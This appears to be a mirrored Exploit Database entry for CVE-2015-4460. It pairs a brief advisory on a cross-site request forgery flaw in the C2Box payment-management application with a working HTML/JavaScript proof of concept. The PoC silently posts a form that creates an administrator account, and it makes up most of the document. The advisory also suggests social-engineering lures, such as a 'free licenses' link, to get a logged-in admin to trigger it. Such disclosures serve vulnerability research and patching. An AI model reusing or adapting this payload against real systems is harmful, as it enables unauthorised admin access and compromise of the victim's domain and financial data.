C2Box 4.0.0(r19171) – Cross-Site Request Forgery

• Exploit Database
• 19 阅读

• 作者： Wissam Bashour
  日期： 2015-06-30
• 类别：

  • webapps
  平台：

  • asp
• 来源：https://www.exploit-db.com/exploits/37447/

• Title: Cross-Site Request Forgery (CSRF) Vulnerability in C2Box applicationAllows adding an Admin User or reset any user's password.
  Author: Wissam Bashour - Help AG Middle East
  Vendor: boxautomation(B.A.S)
  Product: C2Box 
  Version: All versions below 4.0.0(r19171)
  Tested Version: Version 4.0.0(r19171) 
  Severity: HIGH
  CVE Reference: CVE-2015-4460
  
  # About the Product:
  B.A.S C2Box provides global solutions enabling full control and visibility over cash positions and managing domestic or cross border payment processes.
  
  # Description: 
  This Cross-Site Request Forgery vulnerability enables an anonymous attacker to add an admin account into the application. This leads to compromising the whole domain as the application normally uses privileged domain account to perform administration tasks.
  Also the attacker can reset any user's password after gaining the privileged account.
  
  # Vulnerability Class: 
  Cross-Site Request Forgery (CSRF) - https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
  
  # How to Reproduce: (POC):
  Host the attached code in a webserver. Then send the link to the application Admin. The admin should be logged in when he clicks on the link.
  You can entice him to do that by using social engineering techniques.
  Say for example: Log into the application and click the following link to get free licenses
  
  # Disclosure: 
  Discovered: June 10, 2015
  Vendor Notification: June 10, 2015
  Advisory Publication: June 27, 2015
  Public Disclosure: June 27, 2015
  
  # Solution: 
  Upgrade to the latest Build will fix this issue.
  The new version number is 15.6.22
  Release date: June 22, 2015 
   
  
  # credits: 
  Wissam Bashour
  Associate Security Analyst
  Help AG Middle East
  
  
  # Proof of Concept Code:
  https://raw.githubusercontent.com/Siros96/CSRF/master/PoC
  https://www.dropbox.com/s/i45wzl6cqavrzm4/PoC_CSRF_password_reset.mp4?dl=0
  
  
  #References:
  [1] help AG middle East http://www.helpag.com/.
  [2] http://www.boxautomation.com/.
  [3] https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
  [4] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
  
  
  
  ----- Proof of concept ----
  
  <html>
  <!-- CSRF PoC - Wissam-->
  <body>
  <script>
  function submitRequest()
  {
  var xhr = new XMLHttpRequest();
  xhr.open("POST", "http://#thesite/SecuritySetting/UserSecurity/UserManagement.aspx", true);
  xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
  xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
  xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------284963701632007118234117095");
  xhr.withCredentials = true;
  var body = "-----------------------------284963701632007118234117095\r\n" + 
  "Content-Disposition: form-data; name=\"__EVENTTARGET\"\r\n" + 
  "\r\n" + 
  "\r\n" + 
  "-----------------------------284963701632007118234117095\r\n" + 
  "Content-Disposition: form-data; name=\"__EVENTARGUMENT\"\r\n" + 
  "\r\n" + 
  "Content-Disposition: form-data; name=\"__VIEWSTATEENCRYPTED\"\r\n" + 
  "\r\n" + 
  "\r\n" + 
  "-----------------------------284963701632007118234117095\r\n" + 
  "Content-Disposition: form-data; name=\"__EVENTVALIDATION\"\r\n" + 
  "\r\n" + 
  "V0dFoNB2gzNOMIMLLx+05dEOodRjxb1IxsKxMr+ehPpXQ0dPvYTi/CNzoqOkFt0ZFBapLnziRwgnyQas/THRwIawzpqTC0Kr4vX9u+YW5L0t1xef4donRvhTIZYESWR1oeFn1Rwtox5X3e20bAUS4A==\r\n" + 
  "-----------------------------284963701632007118234117095\r\n" + 
  "Content-Disposition: form-data; name=\"ctl00$ContentPlaceHolder1$pnlUser$txtUserName\"\r\n" + 
  "\r\n" + 
  "WISSAM\r\n" + 
  "-----------------------------284963701632007118234117095\r\n" + 
  "Content-Disposition: form-data; name=\"ctl00$ContentPlaceHolder1$pnlUser$txtUserName$CVS\"\r\n" + 
  "\r\n" + 
  "\r\n" + 
  "-----------------------------284963701632007118234117095\r\n" + 
  "Content-Disposition: form-data; name=\"ctl00$ContentPlaceHolder1$pnlUser$txtPassword\"\r\n" + 
  "\r\n" + 
  "wissamwissam\r\n" + 
  "-----------------------------284963701632007118234117095\r\n" + 
  "Content-Disposition: form-data; name=\"ctl00$ContentPlaceHolder1$pnlUser$txtPassword$CVS\"\r\n" + 
  "\r\n" + 
  "\r\n" + 
  "-----------------------------284963701632007118234117095\r\n" + 
  "Content-Disposition: form-data; name=\"ctl00$ContentPlaceHolder1$pnlUser$txtConfirm\"\r\n" + 
  "\r\n" + 
  "wissamwissam\r\n" + 
  "-----------------------------284963701632007118234117095\r\n" + 
  "Content-Disposition: form-data; name=\"ctl00$ContentPlaceHolder1$pnlUser$txtConfirm$CVS\"\r\n" + 
  "\r\n" + 
  "\r\n" + 
  "-----------------------------284963701632007118234117095\r\n" + 
  "Content-Disposition: form-data; name=\"ctl00$ContentPlaceHolder1$pnlUser$txtEmail\"\r\n" + 
  "\r\n" + 
  "wissam@blablabla.com\r\n" + 
  "-----------------------------284963701632007118234117095\r\n" + 
  "Content-Disposition: form-data; name=\"ctl00$ContentPlaceHolder1$pnlUser$txtEmail$CVS\"\r\n" + 
  "\r\n" + 
  "\r\n" + 
  "-----------------------------284963701632007118234117095\r\n" + 
  "Content-Disposition: form-data; name=\"ctl00$ContentPlaceHolder1$pnlUser$btnCreateUser\"\r\n" + 
  "\r\n" + 
  "Create User\r\n" + 
  "-----------------------------284963701632007118234117095\r\n" + 
  "Content-Disposition: form-data; name=\"ctl00_ContentPlaceHolder1_ASPxRoundPanel1_ExportControl1_ASPxPopupControl1WS\"\r\n" + 
  "\r\n" + 
  "0:0:-1:-10000:-10000:0:35:150:1:0:0:0\r\n" + 
  "-----------------------------284963701632007118234117095\r\n" + 
  "Content-Disposition: form-data; name=\"ctl00_ContentPlaceHolder1_ASPxRoundPanel1_ExportControl1_ppSaveLayoutWS\"\r\n" + 
  "\r\n" + 
  "0:0:-1:-10000:-10000:0:400:100:1:0:0:0\r\n" + 
  "-----------------------------284963701632007118234117095\r\n" + 
  "Content-Disposition: form-data; name=\"ctl00$ContentPlaceHolder1$ASPxRoundPanel1$ExportControl1$ppSaveLayout$txtLayoutName\"\r\n" + 
  "\r\n" + 
  "\r\n" + 
  "-----------------------------284963701632007118234117095\r\n" + 
  "Content-Disposition: form-data; name=\"ctl00$ContentPlaceHolder1$ASPxRoundPanel1$ExportControl1$ppSaveLayout$txtLayoutName$CVS\"\r\n" + 
  "\r\n" + 
  "\r\n" + 
  "-----------------------------284963701632007118234117095\r\n" + 
  "Content-Disposition: form-data; name=\"ctl00_ContentPlaceHolder1_ASPxRoundPanel1_ExportControl1_ppShowLayoutsWS\"\r\n" + 
  "\r\n" + 
  "0:0:-1:-10000:-10000:0:280:315:1:0:0:0\r\n" + 
  "-----------------------------284963701632007118234117095\r\n" + 
  "Content-Disposition: form-data; name=\"ctl00$ContentPlaceHolder1$ASPxRoundPanel1$ExportControl1$ppShowLayouts$lbxLayouts\"\r\n" + 
  "\r\n" + 
  "\r\n" + 
  "-----------------------------284963701632007118234117095\r\n" + 
  "Content-Disposition: form-data; name=\"ctl00_ContentPlaceHolder1_ASPxRoundPanel1_ExportControl1_EXPASPxCallbackPanel1_ASPxPopupControl2WS\"\r\n" + 
  "\r\n" + 
  "0:0:-1:-10000:-10000:0:600:450:1:0:0:0\r\n" + 
  "-----------------------------284963701632007118234117095\r\n" + 
  "Content-Disposition: form-data; name=\"ctl00_ContentPlaceHolder1_ASPxRoundPanel1_ExportControl1_EXPASPxCallbackPanel1_ASPxPopupControl2_fileManExp_State\"\r\n" + 
  "\r\n" + 
  "{\"file\":{},\"currentPath\":\"\"}\r\n" + 
  "-----------------------------284963701632007118234117095\r\n" + 
  "Content-Disposition: form-data; name=\"ctl00_ContentPlaceHolder1_ASPxRoundPanel1_ExportControl1_EXPASPxCallbackPanel1_ASPxPopupControl2_fileManExp_Splitter_CS\"\r\n" + 
  "\r\n" + 
  "\r\n" + 
  "-----------------------------284963701632007118234117095\r\n" + 
  "Content-Disposition: form-data; name=\"ctl00$ContentPlaceHolder1$ASPxRoundPanel1$ExportControl1$EXPASPxCallbackPanel1$ASPxPopupControl2$fileManExp$Splitter$FilesGridView$DXSelInput\"\r\n" + 
  "\r\n" + 
  "\r\n" + 
  "-----------------------------284963701632007118234117095\r\n" + 
  "Content-Disposition: form-data; name=\"ctl00$ContentPlaceHolder1$ASPxRoundPanel1$ExportControl1$EXPASPxCallbackPanel1$ASPxPopupControl2$fileManExp$Splitter$FilesGridView$DXKVInput\"\r\n" + 
  "\r\n" + 
  "[]\r\n" + 
  "-----------------------------284963701632007118234117095\r\n" + 
  "Content-Disposition: form-data; name=\"ctl00$ContentPlaceHolder1$ASPxRoundPanel1$ExportControl1$EXPASPxCallbackPanel1$ASPxPopupControl2$fileManExp$Splitter$FilesGridView$CallbackState\"\r\n" + 
  "\r\n" + 
  "BwEHAQIFU3RhdGUHQgcEBwACAQcBAgEHAgIBBwMCAQcABwAHAAcAAgAG//8JAgROYW1lBwAJAgACAAMHBAIABwACAQcABwACAQcABwAHAA==\r\n" + 
  "-----------------------------284963701632007118234117095\r\n" + 
  "Content-Disposition: form-data; name=\"ctl00$ContentPlaceHolder1$ASPxRoundPanel1$ExportControl1$EXPASPxCallbackPanel1$ASPxPopupControl2$fileManExp$Splitter$FilesGridView$DXFocusedRowInput\"\r\n" + 
  "\r\n" + 
  "-1\r\n" + 
  "-----------------------------284963701632007118234117095\r\n" + 
  "Content-Disposition: form-data; name=\"ctl00$ContentPlaceHolder1$ASPxRoundPanel1$ExportControl1$EXPASPxCallbackPanel1$ASPxPopupControl2$fileManExp$Splitter$FilesGridView$DXSyncInput\"\r\n" + 
  "\r\n" + 
  "\r\n" + 
  "-----------------------------284963701632007118234117095\r\n" + 
  "Content-Disposition: form-data; name=\"ctl00_ContentPlaceHolder1_ASPxRoundPanel1_ExportControl1_EXPASPxCallbackPanel1_ASPxPopupControl2_fileManExp_Splitter_Upload_IC\"\r\n" + 
  "\r\n" + 
  "1\r\n" + 
  "-----------------------------284963701632007118234117095\r\n" + 
  "Content-Disposition: form-data; name=\"ctl00_ContentPlaceHolder1_ASPxRoundPanel1_ExportControl1_EXPASPxCallbackPanel1_ASPxPopupControl2_fileManExp_Splitter_Upload_TextBoxT_Input\"; filename=\"\"\r\n" + 
  "Content-Type: application/octet-stream\r\n" + 
  "\r\n" + 
  "\r\n" + 
  "-----------------------------284963701632007118234117095\r\n" + 
  "Content-Disposition: form-data; name=\"ctl00_ContentPlaceHolder1_ASPxRoundPanel1_ExportControl1_EXPASPxCallbackPanel1_ASPxPopupControl2_fileManExp_Splitter_Upload_TextBox0_Input\"; filename=\"\"\r\n" + 
  "Content-Type: application/octet-stream\r\n" + 
  "\r\n" + 
  "\r\n" + 
  "-----------------------------284963701632007118234117095\r\n" + 
  "Content-Disposition: form-data; name=\"ctl00$ContentPlaceHolder1$ASPxRoundPanel1$ASPxGridView1$DXFREditorcol3\"\r\n" + 
  "\r\n" + 
  "\r\n" + 
  "-----------------------------284963701632007118234117095\r\n" + 
  "Content-Disposition: form-data; name=\"ctl00_ContentPlaceHolder1_ASPxRoundPanel1_ASPxGridView1_DXFREditorcol8_VI\"\r\n" + 
  "\r\n" + 
  "\r\n" + 
  "-----------------------------284963701632007118234117095\r\n" + 
  "Content-Disposition: form-data; name=\"ctl00$ContentPlaceHolder1$ASPxRoundPanel1$ASPxGridView1$DXFREditorcol8\"\r\n" + 
  "\r\n" + 
  "\r\n" + 
  "-----------------------------284963701632007118234117095\r\n" + 
  "Content-Disposition: form-data; name=\"ctl00_ContentPlaceHolder1_ASPxRoundPanel1_ASPxGridView1_DXFREditorcol8_DDDWS\"\r\n" + 
  "\r\n" + 
  "0:0:-1:-10000:-10000:0:0:0:1:0:0:0\r\n" + 
  "-----------------------------284963701632007118234117095\r\n" + 
  "Content-Disposition: form-data; name=\"ctl00_ContentPlaceHolder1_ASPxRoundPanel1_ASPxGridView1_DXFREditorcol8_DDD_LDeletedItems\"\r\n" + 
  "\r\n" + 
  "\r\n" + 
  "-----------------------------284963701632007118234117095\r\n" + 
  "Content-Disposition: form-data; name=\"ctl00_ContentPlaceHolder1_ASPxRoundPanel1_ASPxGridView1_DXFREditorcol8_DDD_LInsertedItems\"\r\n" + 
  "\r\n" + 
  "\r\n" + 
  "-----------------------------284963701632007118234117095\r\n" + 
  "Content-Disposition: form-data; name=\"ctl00_ContentPlaceHolder1_ASPxRoundPanel1_ASPxGridView1_DXFREditorcol8_DDD_LCustomCallback\"\r\n" + 
  "\r\n" + 
  "\r\n" + 
  "-----------------------------284963701632007118234117095\r\n" + 
  "Content-Disposition: form-data; name=\"ctl00$ContentPlaceHolder1$ASPxRoundPanel1$ASPxGridView1$DXFREditorcol8$DDD$L\"\r\n" + 
  "\r\n" + 
  "\r\n" + 
  "-----------------------------284963701632007118234117095\r\n" + 
  "Content-Disposition: form-data; name=\"ctl00_ContentPlaceHolder1_ASPxRoundPanel1_ASPxGridView1_DXFREditorcol13_VI\"\r\n" + 
  "\r\n" + 
  "\r\n" + 
  "-----------------------------284963701632007118234117095\r\n" + 
  "Content-Disposition: form-data; name=\"ctl00$ContentPlaceHolder1$ASPxRoundPanel1$ASPxGridView1$DXFREditorcol13\"\r\n" + 
  "\r\n" + 
  "\r\n" + 
  "-----------------------------284963701632007118234117095\r\n" + 
  "Content-Disposition: form-data; name=\"ctl00_ContentPlaceHolder1_ASPxRoundPanel1_ASPxGridView1_DXFREditorcol13_DDDWS\"\r\n" + 
  "\r\n" + 
  "0:0:-1:-10000:-10000:0:0:0:1:0:0:0\r\n" + 
  "-----------------------------284963701632007118234117095\r\n" + 
  "Content-Disposition: form-data; name=\"ctl00_ContentPlaceHolder1_ASPxRoundPanel1_ASPxGridView1_DXFREditorcol13_DDD_LDeletedItems\"\r\n" + 
  "\r\n" + 
  "\r\n" + 
  "-----------------------------284963701632007118234117095\r\n" + 
  "Content-Disposition: form-data; name=\"ctl00_ContentPlaceHolder1_ASPxRoundPanel1_ASPxGridView1_DXFREditorcol13_DDD_LInsertedItems\"\r\n" + 
  "\r\n" + 
  "\r\n" + 
  "-----------------------------284963701632007118234117095\r\n" + 
  "Content-Disposition: form-data; name=\"ctl00_ContentPlaceHolder1_ASPxRoundPanel1_ASPxGridView1_DXFREditorcol13_DDD_LCustomCallback\"\r\n" + 
  "\r\n" + 
  "\r\n" + 
  "-----------------------------284963701632007118234117095\r\n" + 
  "Content-Disposition: form-data; name=\"ctl00$ContentPlaceHolder1$ASPxRoundPanel1$ASPxGridView1$DXFREditorcol13$DDD$L\"\r\n" + 
  "\r\n" + 
  "\r\n" + 
  "-----------------------------284963701632007118234117095\r\n" + 
  "Content-Disposition: form-data; name=\"ctl00$ContentPlaceHolder1$ASPxRoundPanel1$ASPxGridView1$DXFREditorcol12\"\r\n" + 
  "\r\n" + 
  "\r\n" + 
  "-----------------------------284963701632007118234117095\r\n" + 
  "Content-Disposition: form-data; name=\"ctl00$ContentPlaceHolder1$ASPxRoundPanel1$ASPxGridView1$DXFREditorcol11\"\r\n" + 
  "\r\n" + 
  "\r\n" + 
  "-----------------------------284963701632007118234117095\r\n" + 
  "Content-Disposition: form-data; name=\"ctl00$ContentPlaceHolder1$ASPxRoundPanel1$ASPxGridView1$DXFREditorcol10\"\r\n" + 
  "\r\n" + 
  "\r\n" + 
  "-----------------------------284963701632007118234117095\r\n" + 
  "Content-Disposition: form-data; name=\"ctl00$ContentPlaceHolder1$ASPxRoundPanel1$ASPxGridView1$DXFREditorcol9\"\r\n" + 
  "\r\n" + 
  "\r\n" + 
  "-----------------------------284963701632007118234117095\r\n" + 
  "Content-Disposition: form-data; name=\"ctl00_ContentPlaceHolder1_ASPxRoundPanel1_ASPxGridView1_custwindowWS\"\r\n" + 
  "\r\n" + 
  "0:0:-1:-10000:-10000:0:1:0:1:0:0:0\r\n" + 
  "-----------------------------284963701632007118234117095\r\n" + 
  "Content-Disposition: form-data; name=\"ctl00$ContentPlaceHolder1$ASPxRoundPanel1$ASPxGridView1$DXSelInput\"\r\n" + 
  "\r\n" + 
  "\r\n" + 
  "-----------------------------284963701632007118234117095\r\n" + 
  "Content-Disposition: form-data; name=\"ctl00$ContentPlaceHolder1$ASPxRoundPanel1$ASPxGridView1$DXKVInput\"\r\n" + 
  "\r\n" + 
  "[\'29bda11f-d51d-4c78-b7fc-0056d4b826ff\',\'c32608dc-946e-40ec-9be9-9f4e500539e6\',\'ca1a4bd3-9ba0-43a6-980e-60a8177be663\',\'8ccfc87f-e649-4a7b-bd16-a85ea172e54e\',\'e26a0c3b-eae0-4f76-8b88-185df3df8522\',\'0bc5697a-de09-4046-81b8-6f5fdda3f8e9\',\'cd21124b-9aec-472a-96e4-5ebefaa32fb1\',\'565dd57d-0420-4666-a443-7830349e2c66\',\'5aedba74-01b3-4d06-8159-19f3b30e6948\']\r\n" + 
  "-----------------------------284963701632007118234117095\r\n" + 
  "Content-Disposition: form-data; name=\"ctl00$ContentPlaceHolder1$ASPxRoundPanel1$ASPxGridView1$CallbackState\"\r\n" + 
  "\r\n" + 
  "BwQHAQIFU3RhdGUHdwcOBwACAQcAAgAHAAIABwECAQcBAgAHAQIABwECAAcBAgAHAgIBBwgCAQcHAgEHBgIBBwUCAQcEAgEHAAcABwAHAAIABQAAAIAJAgZVc2VySWQHAQIGVXNlcklkCwkCAAIAAwcEAgAHAAIBBzEHAAIBBwAHAAcAAg1TaG93RmlsdGVyUm93CgIBAhBGaWx0ZXJFeHByZXNzaW9uBwIAAglQYWdlSW5kZXgDBwQ=\r\n" + 
  "-----------------------------284963701632007118234117095\r\n" + 
  "Content-Disposition: form-data; name=\"DXScript\"\r\n" + 
  "\r\n" + 
  "1_171,1_94,1_164,1_114,1_121,1_105,1_91,1_156,1_154,1_116,1_93,1_169,1_138,1_170,1_124,1_163,1_162,1_147,1_104,1_166,1_139,1_120,1_98,1_125,1_157,1_108,1_113,1_106,1_152\r\n" + 
  "-----------------------------284963701632007118234117095\r\n" + 
  "Content-Disposition: form-data; name=\"DXCss\"\r\n" + 
  "\r\n" + 
  "0_2117,1_12,0_2121,1_5,0_2015,0_2013,0_2017,0_2019,../../Styles/css/alertify.css,../../Styles/css/themes/default.css,../../Styles/css/bootstrap-theme.css,../../Styles/css/bootstrap.css,../../Styles/css/LobbySiteMapStyle.css,../../Styles/IconFonts/flaticon.css,../../Styles/css/FormStyle.css,../../Styles/css/PopupStyle.css,../../Images/apple-icon-57x57.png,../../Images/apple-icon-60x60.png,../../Images/apple-icon-72x72.png,../../Images/apple-icon-76x76.png,../../Images/apple-icon-114x114.png,../../Images/apple-icon-120x120.png,../../Images/apple-icon-144x144.png,../../Images/apple-icon-152x152.png,../../Images/apple-icon-180x180.png,../../Images/android-icon-192x192.png,../../Images/favicon-32x32.png,../../Images/favicon-96x96.png,../../Images/favicon-16x16.png,../../Images/manifest.json\r\n" + 
  "-----------------------------284963701632007118234117095\r\n" + 
  "Content-Disposition: form-data; name=\"ctl00$ContentPlaceHolder1$pnlUser$btnCreateUser\"\r\n" + 
  "\r\n" + 
  "\r\n" + 
  "-----------------------------284963701632007118234117095--\r\n";
  var aBody = new Uint8Array(body.length);
  for (var i = 0; i < aBody.length; i++)
  aBody[i] = body.charCodeAt(i); 
  xhr.send(new Blob([aBody]));
  }
  </script>
  <form action="#">
  <input type="button" value="PUSH THE BUTTON" onclick="submitRequest();" />
  </form>
  </body>
  </html>